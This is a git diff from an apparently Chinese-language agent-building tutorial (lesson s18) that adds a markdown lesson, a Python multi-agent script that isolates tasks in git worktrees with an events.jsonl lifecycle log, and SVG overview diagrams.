+ +```python +def log_event(event_type: str, worktree_name: str, task_id: int = None): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") +``` + +事件类型:`create`(创建)、`remove`(删除)、`keep`(保留)。重建逻辑:逐行读 `events.jsonl`,每个 worktree 取最后一条事件——`create` 说明还活着,`remove` 说明已清理。 + +--- + +## 相对 s17 的变更 + +| 组件 | 之前 (s17) | 之后 (s18) | +|------|-----------|-----------| +| 工作目录 | 所有 Agent 共享 WORKDIR | 每个任务独立 git worktree | +| Task 数据 | id/subject/status/owner/blockedBy | + worktree 字段(绑定目录) | +| 新函数 | — | create_worktree, bind_task_to_worktree, remove_worktree, keep_worktree, log_event | +| 隔离方式 | 无 | `git worktree add` + 独立分支 `wt/{name}` | +| 收尾 | 任务完成 | keep(保留分支)/ remove(删除+标记完成) | +| 崩溃恢复 | 无 | events.jsonl 生命周期日志 | +| Lead 工具 | 13 (s17) | + create_worktree, remove_worktree, keep_worktree (16) | +| 队友工具 | 7 (s17) | 7(不变,auto-claimed 消息附带 worktree 路径) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s18_worktree_isolation/code.py +``` + +试试这个 prompt: + +`Create two tasks, then create isolated worktrees for each. Run git status in each worktree to confirm isolation.` + +观察重点:两个 worktree 的 `git status` 输出是否显示不同的分支?在一个 worktree 里修改文件,另一个 worktree 是否不受影响? + +--- + +## 接下来 + +现在 Agent 团队能在隔离的工作空间中自组织了。但 Agent 的能力受限于我们给它写的工具——bash、read、write、glob、task... + +如果用户已经有了自己的工具怎么办?比如一个公司内部的 Jira API、一个自建的部署系统?难道要重写一遍? + +s19 MCP Plugin → 给 Agent 装一个插件系统。外部工具通过标准协议接入,Agent 不需要知道它们是谁写的。 + +
+深入 CC 源码 + +CC 的 worktree 系统由两个工具驱动(`EnterWorktreeTool.ts` 127 行、`ExitWorktreeTool.ts` 329 行): + +**EnterWorktree**:接受可选的 `name` 参数创建新 worktree。省略 `name` 时自动生成随机名。新 worktree 的 branch 名基于 HEAD,创建在 `.claude/worktrees/` 下。每个 worktree 的 `/` 分隔段只能包含字母、数字、点、下划线、短横线,最大 64 字符。 + +**ExitWorktree**:`action: 'keep'`(保留目录和分支)或 `'remove'`(删除两者)。Remove 时如果有未提交的改动,除非设置 `discard_changes: true`,否则工具会**拒绝**执行——这是安全机制,防止丢失工作。 + +**isolation**:AgentTool 的 `isolation: 'worktree'` 参数让子 Agent 在 worktree 中运行。这是 fork subagent(s06 分析过)的一种隔离模式。 + +**isDestructive**:ExitWorktree 的 `isDestructive(input)` 返回 `input.action === 'remove'`——只在真正删除时才标记为 destructive(这是 CC 中极少数覆写了 isDestructive 的工具之一,见 s03 分析)。 + +**教学版 vs CC 的关键差异**:教学版做了 task-worktree 双向绑定(Task 数据加 `worktree` 字段),CC **没有这种机制**。CC 的 worktree 状态通过 `PersistedWorktreeSession`(`utils/sessionStorage.ts`)管理,字段包括 `originalCwd`、`worktreePath`、`worktreeName`、`worktreeBranch`、`originalBranch`、`originalHeadCommit`、`sessionId`、`tmuxSessionName`、`hookBased`——没有 taskId。状态通过 `saveWorktreeState()` 写入当前 session 的 transcript 文件(type: `'worktree-state'`),不是单独的文件。教学版用 `events.jsonl` 记录生命周期事件;CC 用 session transcript + sessionStorage。 + +
+ + diff --git a/s18_worktree_isolation/code.py b/s18_worktree_isolation/code.py new file mode 100644 index 000000000..a157ca2ed --- /dev/null +++ b/s18_worktree_isolation/code.py @@ -0,0 +1,861 @@ +#!/usr/bin/env python3 +""" +s18: Worktree Isolation — git worktree + task-directory binding + event log. + +Run: python s18_worktree_isolation/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s17: + - Task dataclass gains worktree field (str | None) + - create_worktree: git worktree add + optional task binding + - bind_task_to_worktree: update task JSON with worktree name + - remove_worktree / keep_worktree: cleanup lifecycle + - log_event: append to .worktrees/events.jsonl + - idle_poll: include worktree path in auto-claimed message + - 3 new Lead tools: create_worktree, remove_worktree, keep_worktree (13→16) + +ASCII topology: + Main repo (/) + ├── .worktrees/auth/ (branch: wt/auth) ← Task #1 + ├── .worktrees/ui/ (branch: wt/ui) ← Task #2 + ├── .tasks/task_xxx.json (worktree: "auth") + └── .worktrees/events.jsonl +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12 + s18 worktree field) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + worktree: str | None = None # s18: bound worktree name + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Worktree System (s18 new) ── + +WORKTREES_DIR = WORKDIR / ".worktrees" +WORKTREES_DIR.mkdir(exist_ok=True) + + +def run_git(args: list[str]) -> str: + try: + r = subprocess.run(["git"] + args, cwd=WORKDIR, + capture_output=True, text=True, timeout=30) + out = (r.stdout + r.stderr).strip() + return out[:5000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: git timeout" + + +def log_event(event_type: str, worktree_name: str, task_id: str = ""): + """Append a lifecycle event to events.jsonl.""" + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") + + +def create_worktree(name: str, task_id: str = "") -> str: + """Create a git worktree with a dedicated branch. Optionally bind to a task.""" + path = WORKTREES_DIR / name + if path.exists(): + return f"Worktree '{name}' already exists at {path}" + result = run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if "error" in result.lower() or "fatal" in result.lower(): + return f"Git error: {result}" + if task_id: + bind_task_to_worktree(task_id, name) + log_event("create", name, task_id) + print(f" \033[33m[worktree] created: {name} at {path}\033[0m") + return f"Worktree '{name}' created at {path}" + + +def bind_task_to_worktree(task_id: str, worktree_name: str): + """Update task with worktree binding. Auto-advance to in_progress.""" + task = load_task(task_id) + task.worktree = worktree_name + if task.status == "pending": + task.status = "in_progress" + save_task(task) + print(f" \033[33m[bind] {task.subject} → worktree:{worktree_name}\033[0m") + + +def remove_worktree(name: str) -> str: + """Remove worktree directory + branch. Auto-complete bound task.""" + path = WORKTREES_DIR / name + if not path.exists(): + return f"Worktree '{name}' not found" + run_git(["worktree", "remove", str(path), "--force"]) + run_git(["branch", "-D", f"wt/{name}"]) + log_event("remove", name) + for task in list_tasks(): + if task.worktree == name and task.status == "in_progress": + task.status = "completed" + save_task(task) + print(f" \033[32m[worktree] auto-completed: {task.subject}\033[0m") + print(f" \033[33m[worktree] removed: {name}\033[0m") + return f"Worktree '{name}' removed" + + +def keep_worktree(name: str) -> str: + """Keep worktree for manual review. Branch preserved.""" + log_event("keep", name) + print(f" \033[36m[worktree] kept: {name}\033[0m") + return f"Worktree '{name}' kept for review (branch: wt/{name})" + + +# ── Prompt Assembly (from s10) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "spawn_teammate, send_message, check_inbox, " + "request_shutdown, submit_plan, review_plan, " + "create_worktree, remove_worktree, keep_worktree.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn autonomous teammates and create isolated worktrees " + "for each task. Teammates auto-claim tasks and work in their " + "assigned worktree directory.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s15) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +# ── MessageBus (from s15) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message", metadata: dict = None): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time(), "metadata": metadata or {}} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"({msg_type}) {content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() +active_teammates: dict[str, bool] = {} + + +# ── Protocol State (from s16) ── + +@dataclass +class ProtocolState: + request_id: str + type: str + sender: str + target: str + status: str + payload: str + created_at: float = field(default_factory=time.time) + + +pending_requests: dict[str, ProtocolState] = {} + + +def new_request_id() -> str: + return f"req_{random.randint(0, 999999):06d}" + + +def match_response(response_type: str, request_id: str, approve: bool): + """Correlate a response to the original request via request_id.""" + state = pending_requests.get(request_id) + if not state: + print(f" \033[31m[protocol] unknown request_id: {request_id}\033[0m") + return + state.status = "approved" if approve else "rejected" + icon = "✓" if approve else "✗" + color = "32" if approve else "31" + print(f" \033[{color}m[protocol] {state.type} {icon} " + f"({request_id}: {state.status})\033[0m") + + +# ── Autonomous Agent (from s17, + worktree path) ── + +IDLE_POLL_INTERVAL = 5 +IDLE_TIMEOUT = 60 + + +def scan_unclaimed_tasks() -> list[dict]: + """Find pending, unowned, unblocked tasks.""" + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed + + +def idle_poll(agent_name: str, messages: list, + name: str, role: str) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): + time.sleep(IDLE_POLL_INTERVAL) + + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + print(f" \033[36m[idle] {name} found inbox messages\033[0m") + return True + + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task_data = unclaimed[0] + claim_task(task_data["id"], agent_name) + wt_info = "" + if task_data.get("worktree"): + wt_path = WORKTREES_DIR / task_data["worktree"] + wt_info = f"\nWork directory: {wt_path}" + messages.append({"role": "user", + "content": f"Task {task_data['id']}: " + f"{task_data['subject']}{wt_info}"}) + print(f" \033[32m[idle] {name} auto-claimed: " + f"{task_data['subject']}\033[0m") + return True + + print(f" \033[31m[idle] {name} timeout ({IDLE_TIMEOUT}s)\033[0m") + return False + + +# ── Teammate Thread (from s15 + s16 + s17) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"You can list and claim tasks from the board. " + f"If a task has a worktree, work in that directory.") + + def handle_inbox_message(name: str, msg: dict, messages: list): + msg_type = msg.get("type", "message") + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + + if msg_type == "shutdown_request": + BUS.send(name, "lead", "Shutting down gracefully.", + "shutdown_response", + {"request_id": req_id, "approve": True}) + print(f" \033[35m[protocol] {name} approved shutdown " + f"({req_id})\033[0m") + return True + + if msg_type == "plan_approval_response": + approve = meta.get("approve", False) + if approve: + messages.append({"role": "user", + "content": "[Plan approved] Proceed with the task."}) + else: + messages.append({"role": "user", + "content": f"[Plan rejected] Feedback: {msg['content']}"}) + return False + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "submit_plan", + "description": "Submit a plan for Lead approval.", + "input_schema": {"type": "object", + "properties": {"plan": {"type": "string"}}, + "required": ["plan"]}}, + {"name": "list_tasks", + "description": "List all tasks on the board.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + ] + + def _run_list_tasks(): + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + def _run_claim_task(task_id: str): + return claim_task(task_id, owner=name) + + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + "submit_plan": lambda plan: _teammate_submit_plan(name, plan), + "list_tasks": _run_list_tasks, + "claim_task": _run_claim_task, + } + + while True: + if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) + + should_shutdown = False + for _ in range(10): + inbox = BUS.read_inbox(name) + for msg in inbox: + stopped = handle_inbox_message(name, msg, messages) + if stopped: + should_shutdown = True + break + if should_shutdown: + break + if inbox and not should_shutdown: + non_protocol = [m for m in inbox + if m.get("type") == "message"] + if non_protocol: + messages.append({"role": "user", + "content": f"{json.dumps(non_protocol)}"}) + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + if should_shutdown: + break + + found_work = idle_poll(name, messages, name, role) + if not found_work: + break + + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role} (autonomous)" + + +def _teammate_submit_plan(from_name: str, plan: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="plan_approval", + sender=from_name, target="lead", + status="pending", payload=plan) + BUS.send(from_name, "lead", plan, + "plan_approval_request", + {"request_id": req_id}) + return f"Plan submitted ({req_id}). Waiting for approval..." + + +# ── Lead Protocol Tools (from s16) ── + +def run_request_shutdown(teammate: str) -> str: + req_id = new_request_id() + pending_requests[req_id] = ProtocolState( + request_id=req_id, type="shutdown", + sender="lead", target=teammate, + status="pending", payload="") + BUS.send("lead", teammate, "Please shut down gracefully.", + "shutdown_request", + {"request_id": req_id}) + print(f" \033[35m[protocol] shutdown_request → {teammate} " + f"({req_id})\033[0m") + return f"Shutdown request sent to {teammate} (req: {req_id})" + + +def run_submit_plan(teammate: str, plan: str) -> str: + BUS.send("lead", teammate, f"Please submit a plan for: {plan}", + "message") + return f"Asked {teammate} to submit a plan" + + +def run_review_plan(request_id: str, approve: bool, + feedback: str = "") -> str: + state = pending_requests.get(request_id) + if not state: + return f"Request {request_id} not found" + if state.status != "pending": + return f"Request {request_id} already {state.status}" + state.status = "approved" if approve else "rejected" + BUS.send("lead", state.sender, + feedback or ("Approved" if approve else "Rejected"), + "plan_approval_response", + {"request_id": request_id, "approve": approve}) + icon = "✓" if approve else "✗" + print(f" \033[32m[protocol] plan {icon} ({request_id})\033[0m") + return f"Plan {'approved' if approve else 'rejected'} ({request_id})" + + +# ── Lead Worktree Tools (s18 new) ── + +def run_create_worktree(name: str, task_id: str = "") -> str: + return create_worktree(name, task_id) + + +def run_remove_worktree(name: str) -> str: + return remove_worktree(name) + + +def run_keep_worktree(name: str) -> str: + return keep_worktree(name) + + +# ── Basic tool handlers ── + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + return "\n".join( + f" {t.id}: {t.subject} [{t.status}]" + + (f" (wt:{t.worktree})" if t.worktree else "") + for t in tasks) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + meta = m.get("metadata", {}) + req_id = meta.get("request_id", "") + tag = f" [{m['type']} req:{req_id}]" if req_id else f" [{m['type']}]" + lines.append(f" [{m['from']}]{tag} {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn an autonomous teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, + # s18 new: worktree tools + {"name": "create_worktree", + "description": "Create an isolated git worktree with its own branch.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "task_id": {"type": "string"}}, + "required": ["name"]}}, + {"name": "remove_worktree", + "description": "Remove a worktree and auto-complete its bound task.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, + {"name": "keep_worktree", + "description": "Keep a worktree for manual review.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}}, + "required": ["name"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, + "create_worktree": run_create_worktree, + "remove_worktree": run_remove_worktree, + "keep_worktree": run_keep_worktree, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "worktree" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s18: worktree isolation") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_team": False, "memories": ""} + while True: + try: + query = input("\033[36ms18 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + + inbox = BUS.read_inbox("lead") + if inbox: + print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m") + for msg in inbox: + meta = msg.get("metadata", {}) + req_id = meta.get("request_id", "") + msg_type = msg.get("type", "") + if req_id and msg_type.endswith("_response"): + approve = meta.get("approve", False) + match_response(msg_type, req_id, approve) + else: + print(f" [{msg['from']}] {msg['content'][:200]}") + print() diff --git a/s18_worktree_isolation/images/worktree-overview.en.svg b/s18_worktree_isolation/images/worktree-overview.en.svg new file mode 100644 index 000000000..ae12887a0 --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.en.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + Task-Directory Binding + Event Log + + + + s17 Preserved + + s18 New + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree Isolation (s18 new: each task gets its own directory + branch) + + + + Main repo (.tasks/ + .worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: Refactor auth module + ✓ Isolated, no impact on Bob or main repo + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: Refactor UI login page + ✓ Isolated, no impact on Alice or main repo + + + + Event log: .worktrees/events.jsonl → create / remove / keep + + + Cleanup: keep (preserve branch for review) / remove (delete + mark done) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE lifecycle + + s18: create_worktree + bind_task + remove/keep + events.jsonl (Lead 13→16) + diff --git a/s18_worktree_isolation/images/worktree-overview.ja.svg b/s18_worktree_isolation/images/worktree-overview.ja.svg new file mode 100644 index 000000000..0115d7517 --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.ja.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + タスク・ディレクトリ紐付け + イベントログ + + + + s17 保持 + + s18 新規 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH(s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree 隔離(s18 新規:各タスクに独立ディレクトリ + 独立ブランチ) + + + + メインリポジトリ(.tasks/ + .worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: 認証モジュールのリファクタリング + ✓ 隔離、Bob とメインリポジトリに影響なし + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: UI ログインページのリファクタリング + ✓ 隔離、Alice とメインリポジトリに影響なし + + + + イベントログ: .worktrees/events.jsonl → create / remove / keep + + + 片付け: keep(ブランチ保持 review)/ remove(削除+完了マーク) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE ライフサイクル + + s18: create_worktree + bind_task + remove/keep + events.jsonl(Lead 13→16) + diff --git a/s18_worktree_isolation/images/worktree-overview.svg b/s18_worktree_isolation/images/worktree-overview.svg new file mode 100644 index 000000000..3d572668a --- /dev/null +++ b/s18_worktree_isolation/images/worktree-overview.svg @@ -0,0 +1,102 @@ + + + + + + + + + + + + + + + + + + + + + + Worktree Isolation — Git Worktree + 任务-目录绑定 + 事件日志 + + + + s17 保留 + + s18 新增 + + + + cron + + + + + messages + + + + + prompt + + + + + LLM + + + + + TOOL DISPATCH (s17 + s18) + bash · read · write · task(4) · send · inbox + ★ request_shutdown · submit_plan · review_plan + + + + + + + Worktree 隔离(s18 新增:每个任务独立目录 + 独立分支) + + + + 主仓库 (.tasks/ + 